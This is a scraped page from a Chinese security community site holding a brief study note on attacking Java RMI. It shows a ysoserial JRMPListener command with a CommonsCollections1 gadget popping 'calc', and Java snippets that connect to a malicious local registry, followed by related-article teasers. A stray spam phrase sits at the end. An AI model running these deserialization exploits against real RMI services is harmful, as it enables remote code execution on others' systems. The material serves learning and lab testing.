<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    java安全-02RMI

    VSole2022-03-25 15:35:13

    攻擊方式

    注冊端攻擊服務端

    java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
    public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {        //開啟一個惡意的reg,然后server去過去鏈接注冊,則會中招        String url = "rmi://127.0.0.1:1099/setUser";        Naming.unbind(url);    }

    注冊端攻擊客戶端

        public static void main(String[] args) {        //PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"        try{            String url = "rmi://127.0.0.1:1099/exp";            User user = (User) Naming.lookup(url);
        }catch(Exception e){            e.printStackTrace();        }    }

    服務端攻擊注冊端

    1. 注冊端開啟

    1. Server端利用CC1進行攻擊

    服務端攻擊客戶端

    1. 服務端將惡意類注冊

    1. 客戶端加載執行

    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    java安全-02RMI
    2022-03-25 15:35:13
    基礎知識動態代理反射攻擊方式注冊端攻擊服務端java -cp .\ysoserial-master-8eb5
    一文回顧攻擊Java RMI方式
    2022-01-06 16:39:57
    RMI存在著三個主體RMI RegistryRMI ClientRMI Server
    一款漏洞檢測工具(460個poc)可使用fofa采集自動化
    2023-04-17 10:13:56
    F-vuln(全稱:Find-Vulnerability)是為了自己工作方便專門編寫的一款自動化工具,主要適用于日常安全服務、滲透測試人員和RedTeam紅隊人員,它集合的功能包括:存活IP探測、開放端口探測、web服務探測、web漏洞掃描、smb爆破、ssh爆破、ftp爆破、mssql爆破等其他數據庫爆破工作以及大量web漏洞檢測模塊。
    confluence-CVE-2022-26134漏洞分析
    2022-06-22 06:29:04
    confluence-CVE-2022-26134漏洞分析
    滲透測試之路:WebLogic中間件漏洞復現
    2022-06-03 22:16:59
    WebLogic是由美國Oracle公司出品的一application server,準確的說就是一個基于JAVAEE而開發的一個中間件,類似Tomcat,WebLogic是一個用于開發,集成,部署與管理大型分布式Web應用,網絡應用和數據庫的java應用服務器。將java動態功能與java Enterprise標準的安全性引入大型網絡應用的開發,集成,部署與管理之中。
    安全風險通告】Apache Dubbo多個高危漏洞安全風險通告
    2021-09-01 23:59:44
    近日,奇安信CERT監測到國外安全研究人員披露Apache Dubbo多個高危漏洞詳情,其中包括Apache Dubbo YAML反序列化漏洞(CVE-2021-36162):解析攻擊者構造的惡意YAML規則時,使用SnakeYAML進行反序列化從而造成遠程代碼執行;Apache Dubbo Hessian協議反序列化漏洞(CVE-2021-36163):當Apache Dubbo服務提...
    安全風險通告】Jira遠程代碼執行漏洞安全風險通告
    2021-07-24 00:00:00
    奇安信CERT致力于第一時間為企業級用戶提供安全風險通告和有效解決方案。風險通告近日,奇安信CERT監測到A
    Java安全小白的入門心得 - java反序列化
    2022-11-07 09:50:18
    Java反序列化是java安全的基礎,想要學好java反序列化,就不能只看看相關文章,要自己動手實踐,看看java反序列化到底是怎么回事。JSON和XML是通用數據交互格式,通常用于不同語言、不同環境下數據的交互,比如前端的JavaScript通過JSON和后端服務通信、微信服務器通過XML和公眾號服務器通信。快速入門Java Serialization(序列化):將java對象以一連串的字節保存在磁盤文件中的過程,也可以說是保存java對象狀態的過程。
    騰訊安全威脅情報中心推出2022年6月必修安全漏洞清單
    2022-07-18 14:44:16
    必修漏洞,就是必須修復、不可拖延的高危漏洞。
    關于JDK7u21 Gadgets兩個問題的探討
    2021-07-28 17:02:02
    最近在分析JDK7u21的Gadgets,有兩個不解之處,閱讀前輩們的文章發現并未提起。1.為什么有的POC入口是LinkedHashSet,有的是HashSet,兩個都可以觸發嗎?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类